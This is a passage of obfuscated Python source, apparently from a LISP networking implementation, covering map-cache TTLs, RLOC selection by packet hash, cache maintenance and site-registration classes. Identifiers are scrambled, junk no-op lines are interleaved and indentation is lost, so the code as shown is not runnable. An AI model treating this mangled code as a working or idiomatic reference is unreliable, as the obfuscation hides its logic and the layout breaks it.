if 85 - 85: I1ii11iIi11i * OoooooooOO . OOooOOo * OOooOOo
IiI1i = ( ( time . time ( ) - self . last_multicast_map_request ) <= 2 )
if ( IiI1i ) : return ( False )
if 47 - 47: IiII / o0oOOo0O0Ooo - IiII . I11i - I1Ii111 * o0oOOo0O0Ooo
self . last_multicast_map_request = lisp_get_timestamp ( )
return ( True )
if 75 - 75: OoO0O00 / II111iiii - I1Ii111
if 95 - 95: OOooOOo / OoOoOO00 + I1ii11iIi11i
def has_ttl_elapsed ( self ) :
if ( self . map_cache_ttl == None ) : return ( False )
Ooo0o0oo0 = time . time ( ) - self . last_refresh_time
if ( Ooo0o0oo0 >= self . map_cache_ttl ) : return ( True )
if 86 - 86: O0 / Ii1I . OoooooooOO . O0
if 87 - 87: Ii1I + o0oOOo0O0Ooo + OoooooooOO . Ii1I
if 73 - 73: o0oOOo0O0Ooo + OoooooooOO - I1Ii111 . iIii1I11I1II1
if 25 - 25: OoooooooOO % I1ii11iIi11i % Oo0Ooo % i11iIiiIii
if 8 - 8: O0 - O0 % Ii1I
i1iIii1 = self . map_cache_ttl - ( self . map_cache_ttl / 10 )
if ( Ooo0o0oo0 >= i1iIii1 ) : return ( True )
return ( False )
if 44 - 44: I1IiiI / iII111i / Oo0Ooo
if 66 - 66: I1Ii111 + OoooooooOO % I1IiiI . iII111i * Oo0Ooo + o0oOOo0O0Ooo
def is_active ( self ) :
if ( self . stats . last_increment == None ) : return ( False )
Ooo0o0oo0 = time . time ( ) - self . stats . last_increment
return ( Ooo0o0oo0 <= 60 )
if 96 - 96: OoO0O00 - ooOoO0o * Ii1I
if 34 - 34: OoO0O00 . Oo0Ooo % Ii1I . IiII + OoOoOO00
def match_eid_tuple ( self , db ) :
if ( self . eid . is_exact_match ( db . eid ) == False ) : return ( False )
if ( self . group . is_exact_match ( db . group ) == False ) : return ( False )
return ( True )
if 10 - 10: OoooooooOO * iII111i * ooOoO0o . Ii1I % I1Ii111 / I1ii11iIi11i
if 71 - 71: Ii1I + IiII
def sort_rloc_set ( self ) :
self . rloc_set . sort ( key = operator . attrgetter ( 'rloc.address' ) )
if 10 - 10: II111iiii % o0oOOo0O0Ooo . o0oOOo0O0Ooo % iII111i
if 2 - 2: OoooooooOO / IiII % Oo0Ooo % iIii1I11I1II1
def delete_rlocs_from_rloc_probe_list ( self ) :
for I1II in self . best_rloc_set :
I1II . delete_from_rloc_probe_list ( self . eid , self . group )
if 62 - 62: oO0o
if 47 - 47: I1IiiI - O0 - I1ii11iIi11i . OoOoOO00
if 98 - 98: o0oOOo0O0Ooo - OoO0O00 . I1ii11iIi11i / OOooOOo
def build_best_rloc_set ( self ) :
iiI1III = self . best_rloc_set
self . best_rloc_set = [ ]
if ( self . rloc_set == None ) : return
if 84 - 84: OoO0O00 . i1IIi / I1Ii111 - Oo0Ooo
if 66 - 66: iII111i - IiII . I1Ii111
if 29 - 29: I1Ii111 - Ii1I + O0 - oO0o - O0
if 68 - 68: iII111i + II111iiii + I1ii11iIi11i * OOooOOo / oO0o
iI1Iii = 256
for I1II in self . rloc_set :
if ( I1II . up_state ( ) ) : iI1Iii = min ( I1II . priority , iI1Iii )
if 20 - 20: Ii1I * OoooooooOO / OoooooooOO + OOooOOo - I1IiiI - O0
if 22 - 22: iII111i - i11iIiiIii + ooOoO0o + oO0o + II111iiii / oO0o
if 7 - 7: iII111i % o0oOOo0O0Ooo
if 68 - 68: iIii1I11I1II1 / II111iiii
if 47 - 47: i11iIiiIii . OOooOOo + I1Ii111 / I1ii11iIi11i . I1IiiI . I1Ii111
if 79 - 79: OoO0O00 / i11iIiiIii . IiII - I11i / iIii1I11I1II1
if 81 - 81: Oo0Ooo . II111iiii + i11iIiiIii - OoOoOO00 * ooOoO0o
if 25 - 25: Ii1I / Oo0Ooo
if 79 - 79: o0oOOo0O0Ooo . i1IIi % I1ii11iIi11i % II111iiii . iIii1I11I1II1
if 45 - 45: I1ii11iIi11i / iIii1I11I1II1 + OoO0O00 / O0 - O0 - I1Ii111
for I1II in self . rloc_set :
if ( I1II . priority <= iI1Iii ) :
if ( I1II . unreach_state ( ) and I1II . last_rloc_probe == None ) :
I1II . last_rloc_probe = lisp_get_timestamp ( )
if 88 - 88: o0oOOo0O0Ooo % I1Ii111
self . best_rloc_set . append ( I1II )
if 4 - 4: i11iIiiIii + o0oOOo0O0Ooo % I11i - I1ii11iIi11i * I1ii11iIi11i
if 87 - 87: I1Ii111 % i11iIiiIii + O0
if 67 - 67: OoooooooOO / i1IIi / ooOoO0o . i1IIi - i11iIiiIii . i1IIi
if 41 - 41: i11iIiiIii / ooOoO0o - Ii1I + I11i
if 15 - 15: I1ii11iIi11i
if 22 - 22: iIii1I11I1II1 - i1IIi - i11iIiiIii / I1IiiI + o0oOOo0O0Ooo
if 56 - 56: I1IiiI . ooOoO0o
if 35 - 35: iIii1I11I1II1 % Oo0Ooo + o0oOOo0O0Ooo * o0oOOo0O0Ooo % ooOoO0o
for I1II in iiI1III :
if ( I1II . priority < iI1Iii ) : continue
I1II . delete_from_rloc_probe_list ( self . eid , self . group )
if 10 - 10: I1ii11iIi11i / II111iiii % II111iiii - OoooooooOO * o0oOOo0O0Ooo / ooOoO0o
for I1II in self . best_rloc_set :
if ( I1II . rloc . is_null ( ) ) : continue
I1II . add_to_rloc_probe_list ( self . eid , self . group )
if 26 - 26: OoO0O00 . O0 * iII111i % OoOoOO00 % iIii1I11I1II1
if 37 - 37: iII111i - ooOoO0o * Ii1I + II111iiii * i11iIiiIii
if 8 - 8: OoooooooOO % I11i - iII111i * OOooOOo . O0
def select_rloc ( self , lisp_packet , ipc_socket ) :
IiiiIi1iiii11 = lisp_packet . packet
I1IIiIiiiii1 = lisp_packet . inner_version
oOOoO0O = len ( self . best_rloc_set )
if ( oOOoO0O == 0 ) :
self . stats . increment ( len ( IiiiIi1iiii11 ) )
return ( [ None , None , None , self . action , None , None ] )
if 7 - 7: I1ii11iIi11i
if 29 - 29: I11i - ooOoO0o
iIIiIIi = 4 if lisp_load_split_pings else 0
I1iI1111ii1I1 = lisp_packet . hash_ports ( )
if ( I1IIiIiiiii1 == 4 ) :
for iIi1I1 in range ( 8 + iIIiIIi ) :
I1iI1111ii1I1 = I1iI1111ii1I1 ^ struct . unpack ( "B" , IiiiIi1iiii11 [ iIi1I1 + 12 ] ) [ 0 ]
if 93 - 93: ooOoO0o / OoOoOO00
elif ( I1IIiIiiiii1 == 6 ) :
for iIi1I1 in range ( 0 , 32 + iIIiIIi , 4 ) :
I1iI1111ii1I1 = I1iI1111ii1I1 ^ struct . unpack ( "I" , IiiiIi1iiii11 [ iIi1I1 + 8 : iIi1I1 + 12 ] ) [ 0 ]
if 79 - 79: O0 % I1ii11iIi11i * I1Ii111 . Oo0Ooo / i11iIiiIii
I1iI1111ii1I1 = ( I1iI1111ii1I1 >> 16 ) + ( I1iI1111ii1I1 & 0xffff )
I1iI1111ii1I1 = ( I1iI1111ii1I1 >> 8 ) + ( I1iI1111ii1I1 & 0xff )
else :
for iIi1I1 in range ( 0 , 12 + iIIiIIi , 4 ) :
I1iI1111ii1I1 = I1iI1111ii1I1 ^ struct . unpack ( "I" , IiiiIi1iiii11 [ iIi1I1 : iIi1I1 + 4 ] ) [ 0 ]
if 45 - 45: OoOoOO00 % O0 - OoOoOO00 + iIii1I11I1II1 / II111iiii - ooOoO0o
if 10 - 10: OOooOOo
if 78 - 78: OOooOOo * I1ii11iIi11i % i11iIiiIii % o0oOOo0O0Ooo . I1ii11iIi11i / OoooooooOO
if ( lisp_data_plane_logging ) :
IiII1IIii1 = [ ]
for I1I111iIiI in self . best_rloc_set :
if ( I1I111iIiI . rloc . is_null ( ) ) : continue
IiII1IIii1 . append ( [ I1I111iIiI . rloc . print_address_no_iid ( ) , I1I111iIiI . print_state ( ) ] )
if 80 - 80: IiII + i11iIiiIii . I1Ii111 * Oo0Ooo % OoooooooOO
dprint ( "Packet hash {}, index {}, best-rloc-list: {}" . format ( hex ( I1iI1111ii1I1 ) , I1iI1111ii1I1 % oOOoO0O , red ( str ( IiII1IIii1 ) , False ) ) )
if 12 - 12: iII111i / I11i
if 70 - 70: Oo0Ooo + O0 - o0oOOo0O0Ooo
if 85 - 85: I1Ii111
if 39 - 39: OoOoOO00 * oO0o
if 62 - 62: OoOoOO00 / OoOoOO00 * OoO0O00
if 38 - 38: I1Ii111 + ooOoO0o % I11i
I1II = self . best_rloc_set [ I1iI1111ii1I1 % oOOoO0O ]
if 22 - 22: I1Ii111 . Ii1I % I1Ii111 * I1IiiI / iIii1I11I1II1
if 12 - 12: Oo0Ooo / IiII % ooOoO0o / iIii1I11I1II1 % O0 / i11iIiiIii
if 58 - 58: i11iIiiIii * O0
if 85 - 85: oO0o
if 57 - 57: II111iiii . I1IiiI - OOooOOo
oooooO0oO0o = lisp_get_echo_nonce ( I1II . rloc , None )
if ( oooooO0oO0o ) :
oooooO0oO0o . change_state ( I1II )
if ( I1II . no_echoed_nonce_state ( ) ) :
oooooO0oO0o . request_nonce_sent = None
if 54 - 54: i1IIi + OoOoOO00
if 76 - 76: OoOoOO00
if 54 - 54: o0oOOo0O0Ooo . i11iIiiIii + I1IiiI * ooOoO0o - ooOoO0o
if 28 - 28: I1Ii111 . i11iIiiIii * oO0o % ooOoO0o / iII111i . OOooOOo
if 57 - 57: OoooooooOO . iIii1I11I1II1 % iII111i % Oo0Ooo
if 92 - 92: I1Ii111 - Ii1I + I1Ii111
if ( I1II . up_state ( ) == False ) :
IIi = I1iI1111ii1I1 % oOOoO0O
ooo = ( IIi + 1 ) % oOOoO0O
while ( ooo != IIi ) :
I1II = self . best_rloc_set [ ooo ]
if ( I1II . up_state ( ) ) : break
ooo = ( ooo + 1 ) % oOOoO0O
if 81 - 81: o0oOOo0O0Ooo . OoOoOO00 . i11iIiiIii
if ( ooo == IIi ) :
self . build_best_rloc_set ( )
return ( [ None , None , None , None , None , None ] )
if 13 - 13: i1IIi
if 70 - 70: O0 / II111iiii
if 98 - 98: OoOoOO00 - O0 . O0 + ooOoO0o * iIii1I11I1II1
if 7 - 7: IiII * OoOoOO00 + iIii1I11I1II1 / OoOoOO00 + Oo0Ooo / o0oOOo0O0Ooo
if 77 - 77: i1IIi . I1IiiI
if 59 - 59: O0 + OoooooooOO - i1IIi
I1II . stats . increment ( len ( IiiiIi1iiii11 ) )
if 87 - 87: IiII * OoooooooOO / Oo0Ooo % iIii1I11I1II1 % oO0o
if 97 - 97: ooOoO0o % i1IIi . IiII / Oo0Ooo . I1Ii111 . OoO0O00
if 12 - 12: I1IiiI
if 99 - 99: II111iiii - OoOoOO00
if ( I1II . rle_name and I1II . rle == None ) :
if ( lisp_rle_list . has_key ( I1II . rle_name ) ) :
I1II . rle = lisp_rle_list [ I1II . rle_name ]
if 22 - 22: i11iIiiIii * II111iiii
if 11 - 11: Oo0Ooo % i1IIi
if ( I1II . rle ) : return ( [ None , None , None , None , I1II . rle , None ] )
if 70 - 70: II111iiii * Oo0Ooo * OOooOOo - I1IiiI + iIii1I11I1II1 + ooOoO0o
if 27 - 27: I1ii11iIi11i - I1Ii111 * O0 % ooOoO0o / I1IiiI
if 53 - 53: i11iIiiIii * i11iIiiIii % O0 % IiII
if 57 - 57: I1IiiI % i1IIi * OoO0O00 + I1Ii111 . I11i % I11i
if ( I1II . elp and I1II . elp . use_elp_node ) :
return ( [ I1II . elp . use_elp_node . address , None , None , None , None ,
None ] )
if 69 - 69: I1ii11iIi11i / OoOoOO00 + iIii1I11I1II1
if 8 - 8: OoooooooOO
if 72 - 72: OoooooooOO % I1ii11iIi11i - OoO0O00 . OoooooooOO
if 83 - 83: o0oOOo0O0Ooo * Ii1I - Oo0Ooo * iII111i - i11iIiiIii
if 6 - 6: I1IiiI + i11iIiiIii + O0 / i1IIi
I11IiiiIi1i1I11I = None if ( I1II . rloc . is_null ( ) ) else I1II . rloc
Oo0o = I1II . translated_port
iI1IIi1I = self . action if ( I11IiiiIi1i1I11I == None ) else None
if 40 - 40: OoO0O00
if 55 - 55: oO0o
if 60 - 60: OOooOOo + OOooOOo - Ii1I / iII111i
if 42 - 42: IiII % oO0o - o0oOOo0O0Ooo * iII111i - Oo0Ooo
if 19 - 19: I1IiiI - iII111i - oO0o / II111iiii
o0OOO = None
if ( oooooO0oO0o and oooooO0oO0o . request_nonce_timeout ( ) == False ) :
o0OOO = oooooO0oO0o . get_request_or_echo_nonce ( ipc_socket , I11IiiiIi1i1I11I )
if 98 - 98: IiII * OoOoOO00
if 13 - 13: O0 + oO0o - iIii1I11I1II1 - Oo0Ooo % I1IiiI
if 45 - 45: O0
if 55 - 55: i11iIiiIii * Ii1I % OOooOOo + ooOoO0o - I1ii11iIi11i . Oo0Ooo
if 48 - 48: o0oOOo0O0Ooo
return ( [ I11IiiiIi1i1I11I , Oo0o , o0OOO , iI1IIi1I , None , I1II ] )
if 55 - 55: OOooOOo - OoooooooOO * iIii1I11I1II1 + iII111i % II111iiii
if 33 - 33: I1Ii111 * oO0o * OoooooooOO + OOooOOo - I1IiiI + I1Ii111
def do_rloc_sets_match ( self , rloc_address_set ) :
if ( len ( self . rloc_set ) != len ( rloc_address_set ) ) : return ( False )
if 92 - 92: ooOoO0o * I11i % iIii1I11I1II1 + Ii1I - OoOoOO00
if 31 - 31: OoooooooOO
if 87 - 87: OoooooooOO - Ii1I . I11i / I1Ii111 . i1IIi
if 86 - 86: i1IIi . oO0o % OOooOOo
if 99 - 99: oO0o / I1Ii111 * oO0o * I11i
for o0oO0O00 in self . rloc_set :
for I1II in rloc_address_set :
if ( I1II . is_exact_match ( o0oO0O00 . rloc ) == False ) : continue
I1II = None
break
if 38 - 38: o0oOOo0O0Ooo + OoOoOO00
if ( I1II == rloc_address_set [ - 1 ] ) : return ( False )
if 24 - 24: Ii1I - OOooOOo - o0oOOo0O0Ooo - I1Ii111 / OoooooooOO
return ( True )
if 17 - 17: OoO0O00
if 79 - 79: Ii1I - II111iiii
def get_rloc ( self , rloc ) :
for o0oO0O00 in self . rloc_set :
I1I111iIiI = o0oO0O00 . rloc
if ( rloc . is_exact_match ( I1I111iIiI ) ) : return ( o0oO0O00 )
if 57 - 57: II111iiii / OoooooooOO
return ( None )
if 4 - 4: I11i * OoOoOO00
if 18 - 18: iIii1I11I1II1 % OOooOOo - I1ii11iIi11i * i1IIi + Oo0Ooo
def get_rloc_by_interface ( self , interface ) :
for o0oO0O00 in self . rloc_set :
if ( o0oO0O00 . interface == interface ) : return ( o0oO0O00 )
if 87 - 87: oO0o . I11i
return ( None )
if 15 - 15: oO0o
if 45 - 45: Oo0Ooo * IiII * OoO0O00 + iIii1I11I1II1
def add_db ( self ) :
if ( self . group . is_null ( ) ) :
lisp_db_for_lookups . add_cache ( self . eid , self )
else :
Oooo00oo = lisp_db_for_lookups . lookup_cache ( self . group , True )
if ( Oooo00oo == None ) :
Oooo00oo = lisp_mapping ( self . group , self . group , [ ] )
lisp_db_for_lookups . add_cache ( self . group , Oooo00oo )
if 89 - 89: IiII . IiII . oO0o % iII111i
Oooo00oo . add_source_entry ( self )
if 27 - 27: OoOoOO00 + O0 % i1IIi - Oo0Ooo
if 96 - 96: O0 % o0oOOo0O0Ooo + OOooOOo % I1IiiI
if 51 - 51: i1IIi . o0oOOo0O0Ooo % I1IiiI - OoooooooOO / OoOoOO00 - I11i
def add_cache ( self , do_ipc = True ) :
if ( self . group . is_null ( ) ) :
lisp_map_cache . add_cache ( self . eid , self )
if ( lisp_program_hardware ) : lisp_program_vxlan_hardware ( self )
else :
o0oO0o00 = lisp_map_cache . lookup_cache ( self . group , True )
if ( o0oO0o00 == None ) :
o0oO0o00 = lisp_mapping ( self . group , self . group , [ ] )
o0oO0o00 . eid . copy_address ( self . group )
o0oO0o00 . group . copy_address ( self . group )
lisp_map_cache . add_cache ( self . group , o0oO0o00 )
if 45 - 45: O0 * II111iiii / i11iIiiIii
if ( self . eid . is_null ( ) ) : self . eid . make_default_route ( o0oO0o00 . group )
o0oO0o00 . add_source_entry ( self )
if 38 - 38: OoooooooOO % i11iIiiIii - O0 / O0
if ( do_ipc ) : lisp_write_ipc_map_cache ( True , self )
if 59 - 59: OoO0O00 % iII111i + oO0o * II111iiii . OOooOOo
if 26 - 26: OOooOOo % OoooooooOO . Ii1I / iIii1I11I1II1 * I1IiiI
def delete_cache ( self ) :
self . delete_rlocs_from_rloc_probe_list ( )
lisp_write_ipc_map_cache ( False , self )
if 85 - 85: IiII / Ii1I - I1ii11iIi11i * OOooOOo
if ( self . group . is_null ( ) ) :
lisp_map_cache . delete_cache ( self . eid )
if ( lisp_program_hardware ) :
ii1111Ii = self . eid . print_prefix_no_iid ( )
os . system ( "ip route delete {}" . format ( ii1111Ii ) )
if 8 - 8: oO0o - iIii1I11I1II1 * iII111i
else :
o0oO0o00 = lisp_map_cache . lookup_cache ( self . group , True )
if ( o0oO0o00 == None ) : return
if 15 - 15: II111iiii * O0 % I1ii11iIi11i % Ii1I . OoOoOO00
I11IIi1I11iI = o0oO0o00 . lookup_source_cache ( self . eid , True )
if ( I11IIi1I11iI == None ) : return
if 3 - 3: o0oOOo0O0Ooo
o0oO0o00 . source_cache . delete_cache ( self . eid )
if ( o0oO0o00 . source_cache . cache_size ( ) == 0 ) :
lisp_map_cache . delete_cache ( self . group )
if 18 - 18: OOooOOo . II111iiii . OoOoOO00 / i1IIi . o0oOOo0O0Ooo
if 57 - 57: i1IIi / I11i + OoO0O00 * OOooOOo + OoooooooOO
if 30 - 30: I1Ii111 . IiII . iIii1I11I1II1 % o0oOOo0O0Ooo + iIii1I11I1II1
if 83 - 83: I1IiiI % OoOoOO00 - o0oOOo0O0Ooo
def add_source_entry ( self , source_mc ) :
if ( self . source_cache == None ) : self . source_cache = lisp_cache ( )
self . source_cache . add_cache ( source_mc . eid , source_mc )
if 85 - 85: OoO0O00 * I1IiiI - I1Ii111 . ooOoO0o * II111iiii
if 76 - 76: OoO0O00 * IiII * oO0o * OoOoOO00
def lookup_source_cache ( self , source , exact ) :
if ( self . source_cache == None ) : return ( None )
return ( self . source_cache . lookup_cache ( source , exact ) )
if 67 - 67: OoooooooOO - I1ii11iIi11i - II111iiii
if 26 - 26: ooOoO0o - i1IIi / OOooOOo + OoOoOO00 / iII111i
def dynamic_eid_configured ( self ) :
return ( self . dynamic_eids != None )
if 27 - 27: I11i % Ii1I / iII111i . OoOoOO00
if 88 - 88: iII111i - i11iIiiIii * I1Ii111 * i11iIiiIii - O0
def star_secondary_iid ( self , prefix ) :
if ( self . secondary_iid == None ) : return ( prefix )
IiIIi11i111 = "," + str ( self . secondary_iid )
return ( prefix . replace ( IiIIi11i111 , IiIIi11i111 + "*" ) )
if 8 - 8: oO0o + O0
if 52 - 52: I11i * OOooOOo - OoOoOO00 % iIii1I11I1II1 . II111iiii
def increment_decap_stats ( self , packet ) :
Oo0o = packet . udp_dport
if ( Oo0o == LISP_DATA_PORT ) :
I1II = self . get_rloc ( packet . outer_dest )
else :
if 1 - 1: OOooOOo / I1IiiI / Ii1I * iII111i
if 14 - 14: ooOoO0o . O0 * OOooOOo
if 34 - 34: I1ii11iIi11i . OOooOOo + OoO0O00 % o0oOOo0O0Ooo * O0 * I1IiiI
if 9 - 9: IiII / i11iIiiIii . o0oOOo0O0Ooo - OOooOOo % I1Ii111
for I1II in self . rloc_set :
if ( I1II . translated_port != 0 ) : break
if 65 - 65: I1IiiI % OoOoOO00
if 45 - 45: o0oOOo0O0Ooo
if ( I1II != None ) : I1II . stats . increment ( len ( packet . packet ) )
self . stats . increment ( len ( packet . packet ) )
if 33 - 33: ooOoO0o % O0 % I1ii11iIi11i % o0oOOo0O0Ooo + i11iIiiIii . I1Ii111
if 21 - 21: I1Ii111 * I1ii11iIi11i * ooOoO0o
def rtrs_in_rloc_set ( self ) :
for I1II in self . rloc_set :
if ( I1II . is_rtr ( ) ) : return ( True )
if 73 - 73: OoOoOO00 * O0
return ( False )
if 1 - 1: OOooOOo * OoooooooOO
if 46 - 46: I1ii11iIi11i * I1Ii111 / OOooOOo / I1IiiI
def add_recent_source ( self , source ) :
self . recent_sources [ source . print_address ( ) ] = lisp_get_timestamp ( )
if 7 - 7: OOooOOo / OoOoOO00
if 93 - 93: iIii1I11I1II1 * Ii1I - iII111i
if 94 - 94: iIii1I11I1II1 * iIii1I11I1II1 * I11i % i11iIiiIii
class lisp_dynamic_eid ( ) :
def __init__ ( self ) :
self . dynamic_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . uptime = lisp_get_timestamp ( )
self . interface = None
self . last_packet = None
self . timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
if 38 - 38: I1IiiI % I1ii11iIi11i * I1IiiI + OOooOOo - OoOoOO00
if 78 - 78: OOooOOo + I1Ii111
def get_timeout ( self , interface ) :
try :
I1iIiI = lisp_myinterfaces [ interface ]
self . timeout = I1iIiI . dynamic_eid_timeout
except :
self . timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
if 4 - 4: i11iIiiIii + OoOoOO00 - Ii1I * i1IIi * i11iIiiIii
if 46 - 46: IiII . iII111i % OoooooooOO % IiII + Ii1I - OoooooooOO
if 23 - 23: O0 - iII111i
if 18 - 18: II111iiii % i11iIiiIii + I11i - OOooOOo
class lisp_group_mapping ( ) :
def __init__ ( self , group_name , ms_name , group_prefix , sources , rle_addr ) :
self . group_name = group_name
self . group_prefix = group_prefix
self . use_ms_name = ms_name
self . sources = sources
self . rle_address = rle_addr
if 100 - 100: o0oOOo0O0Ooo / Ii1I - iIii1I11I1II1 / oO0o
if 68 - 68: I11i / II111iiii * oO0o . II111iiii * OOooOOo
def add_group ( self ) :
lisp_group_mapping_list [ self . group_name ] = self
if 78 - 78: I11i * OoO0O00 / II111iiii
if 86 - 86: I1Ii111 % II111iiii
if 90 - 90: OoO0O00 / I11i - Oo0Ooo
if 76 - 76: O0 + OoO0O00 / ooOoO0o . II111iiii * iIii1I11I1II1 . I1Ii111
if 43 - 43: Oo0Ooo + o0oOOo0O0Ooo % o0oOOo0O0Ooo % I1ii11iIi11i / iIii1I11I1II1 . I1ii11iIi11i
if 59 - 59: IiII . OoO0O00 - OoooooooOO . O0
if 33 - 33: Ii1I
if 95 - 95: OoooooooOO + OoO0O00 * ooOoO0o
if 40 - 40: I1IiiI / OOooOOo * Ii1I
if 98 - 98: I1IiiI
def lisp_is_group_more_specific ( group_str , group_mapping ) :
IiIIi11i111 = group_mapping . group_prefix . instance_id
oO00OO0Ooo00O = group_mapping . group_prefix . mask_len
OOo0oOOO0 = lisp_address ( LISP_AFI_IPV4 , group_str , 32 , IiIIi11i111 )
if ( OOo0oOOO0 . is_more_specific ( group_mapping . group_prefix ) ) : return ( oO00OO0Ooo00O )
return ( - 1 )
if 4 - 4: I1IiiI % O0 / Oo0Ooo / O0
if 90 - 90: ooOoO0o - O0 . IiII - O0 . iIii1I11I1II1
if 42 - 42: I1ii11iIi11i
if 51 - 51: iII111i % i11iIiiIii . OoO0O00 . IiII - OoOoOO00 * i1IIi
if 14 - 14: I1ii11iIi11i . OoO0O00
if 26 - 26: iII111i / ooOoO0o / Oo0Ooo / Oo0Ooo . I1ii11iIi11i * OOooOOo
if 25 - 25: IiII % I1IiiI / O0 % OOooOOo - OoooooooOO
def lisp_lookup_group ( group ) :
IiII1IIii1 = None
for ii1i111 in lisp_group_mapping_list . values ( ) :
oO00OO0Ooo00O = lisp_is_group_more_specific ( group , ii1i111 )
if ( oO00OO0Ooo00O == - 1 ) : continue
if ( IiII1IIii1 == None or oO00OO0Ooo00O > IiII1IIii1 . group_prefix . mask_len ) : IiII1IIii1 = ii1i111
if 58 - 58: Ii1I * oO0o . I1ii11iIi11i % I1IiiI - ooOoO0o
return ( IiII1IIii1 )
if 100 - 100: i11iIiiIii / O0 . Oo0Ooo + i1IIi . OoOoOO00
if 76 - 76: OoooooooOO - O0
lisp_site_flags = {
"P" : "ETR is {}Requesting Map-Server to Proxy Map-Reply" ,
"S" : "ETR is {}LISP-SEC capable" ,
"I" : "xTR-ID and site-ID are {}included in Map-Register" ,
"T" : "Use Map-Register TTL field to timeout registration is {}set" ,
"R" : "Merging registrations are {}requested" ,
"M" : "ETR is {}a LISP Mobile-Node" ,
"N" : "ETR is {}requesting Map-Notify messages from Map-Server"
}
if 17 - 17: Oo0Ooo % I1Ii111 . oO0o - O0
class lisp_site ( ) :
def __init__ ( self ) :
self . site_name = ""
self . description = ""
self . shutdown = False
self . auth_sha1_or_sha2 = False
self . auth_key = { }
self . encryption_key = None
self . allowed_prefixes = { }
self . allowed_prefixes_sorted = [ ]
self . allowed_rlocs = { }
self . map_notifies_sent = 0
self . map_notify_acks_received = 0
if 32 - 32: O0 % O0
if 66 - 66: iII111i / i1IIi - Oo0Ooo . Ii1I
if 65 - 65: I1ii11iIi11i % ooOoO0o - OoOoOO00 + ooOoO0o + Oo0Ooo
class lisp_site_eid ( ) :
def __init__ ( self , site ) :
self . site = site
self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . first_registered = 0
self . last_registered = 0
self . last_registerer = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
self . registered = False
self . registered_rlocs = [ ]
self . auth_sha1_or_sha2 = False
self . individual_registrations = { }
self . map_registers_received = 0
self . proxy_reply_requested = False
self . force_proxy_reply = False
self . force_nat_proxy_reply = False
self . force_ttl = None
self . pitr_proxy_reply_drop = False
self . proxy_reply_action = ""
self . lisp_sec_present = False
self . map_notify_requested = False
self . mobile_node_requested = False
self . echo_nonce_capable = False
self . use_register_ttl_requested = False
self . merge_register_requested = False
self . xtr_id_present = False
self . xtr_id = 0
self . site_id = 0
self . accept_more_specifics = False
self . parent_for_more_specifics = None
self . dynamic = False
self . more_specific_registrations = [ ]
self . source_cache = None
self . inconsistent_registration = False
self . policy = None
self . require_signature = False
self . encrypt_json = False
if 95 - 95: I1Ii111 * i11iIiiIii - I1IiiI - OoOoOO00 . ooOoO0o
if 34 - 34: OoooooooOO % I1ii11iIi11i + OoooooooOO % i11iIiiIii / IiII - ooOoO0o
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
if 74 - 74: iIii1I11I1II1 % II111iiii + IiII
if 71 - 71: I1IiiI / O0 * i1IIi . i1IIi + Oo0Ooo
def print_flags ( self , html ) :
if ( html == False ) :
oOOO = "{}-{}-{}-{}-{}-{}-{}" . format ( "P" if self . proxy_reply_requested else "p" ,
# IiII % i1IIi
"S" if self . lisp_sec_present else "s" ,
"I" if self . xtr_id_present else "i" ,
"T" if self . use_register_ttl_requested else "t" ,
"R" if self . merge_register_requested else "r" ,
"M" if self . mobile_node_requested else "m" ,
"N" if self . map_notify_requested else "n" )
else :
O0o0ooo00o00 = self . print_flags ( False )
O0o0ooo00o00 = O0o0ooo00o00 . split ( "-" )
oOOO = ""
for OOo0 in O0o0ooo00o00 :
oOo = lisp_site_flags [ OOo0 . upper ( ) ]
oOo = oOo . format ( "" if OOo0 . isupper ( ) else "not " )
oOOO += lisp_span ( OOo0 , oOo )
if ( OOo0 . lower ( ) != "n" ) : oOOO += "-"
if 14 - 14: iII111i * OoOoOO00
if 69 - 69: OoooooooOO
return ( oOOO )
if 96 - 96: Oo0Ooo % I11i - iII111i . o0oOOo0O0Ooo . I1ii11iIi11i . i1IIi
if 74 - 74: i1IIi - i11iIiiIii / O0 - o0oOOo0O0Ooo
def copy_state_to_parent ( self , child ) :
self . xtr_id = child . xtr_id
self . site_id = child . site_id
self . first_registered = child . first_registered
self . last_registered = child . last_registered
self . last_registerer = child . last_registerer
self . register_ttl = child . register_ttl
if ( self . registered == False ) :
self . first_registered = lisp_get_timestamp ( )
if 65 - 65: oO0o
self . auth_sha1_or_sha2 = child . auth_sha1_or_sha2
self . registered = child . registered
self . proxy_reply_requested = child . proxy_reply_requested
self . lisp_sec_present = child . lisp_sec_present
self . xtr_id_present = child . xtr_id_present
self . use_register_ttl_requested = child . use_register_ttl_requested
self . merge_register_requested = child . merge_register_requested
self . mobile_node_requested = child . mobile_node_requested
self . map_notify_requested = child . map_notify_requested
if 57 - 57: I1Ii111 + IiII . o0oOOo0O0Ooo % OoO0O00 - I11i * oO0o
if 55 - 55: I1IiiI / ooOoO0o
def build_sort_key ( self ) :
O0o0OOO = lisp_cache ( )
iiIi , o0Oo = O0o0OOO . build_key ( self . eid )
OO0OoOO = ""
if ( self . group . is_null ( ) == False ) :
iiiIiII , OO0OoOO = O0o0OOO . build_key ( self . group )
OO0OoOO = "-" + OO0OoOO [ 0 : 12 ] + "-" + str ( iiiIiII ) + "-" + OO0OoOO [ 12 : : ]
if 6 - 6: II111iiii + I1Ii111
o0Oo = o0Oo [ 0 : 12 ] + "-" + str ( iiIi ) + "-" + o0Oo [ 12 : : ] + OO0OoOO
del ( O0o0OOO )
return ( o0Oo )
if 66 - 66: ooOoO0o - II111iiii % OOooOOo / I1ii11iIi11i * OoOoOO00 % IiII
if 58 - 58: II111iiii * iII111i . IiII . I1ii11iIi11i / i11iIiiIii
def merge_in_site_eid ( self , child ) :
i111i11I = False
if ( self . group . is_null ( ) ) :
self . merge_rlocs_in_site_eid ( )
else :
i111i11I = self . merge_rles_in_site_eid ( )
if 63 - 63: OoO0O00 - I1Ii111 - II111iiii
if 79 - 79: II111iiii - II111iiii + OoOoOO00 / iII111i % OoooooooOO - OoO0O00
if 22 - 22: o0oOOo0O0Ooo + I1Ii111 . Oo0Ooo
if 84 - 84: O0 + I1IiiI % Oo0Ooo + OOooOOo
if 94 - 94: OOooOOo
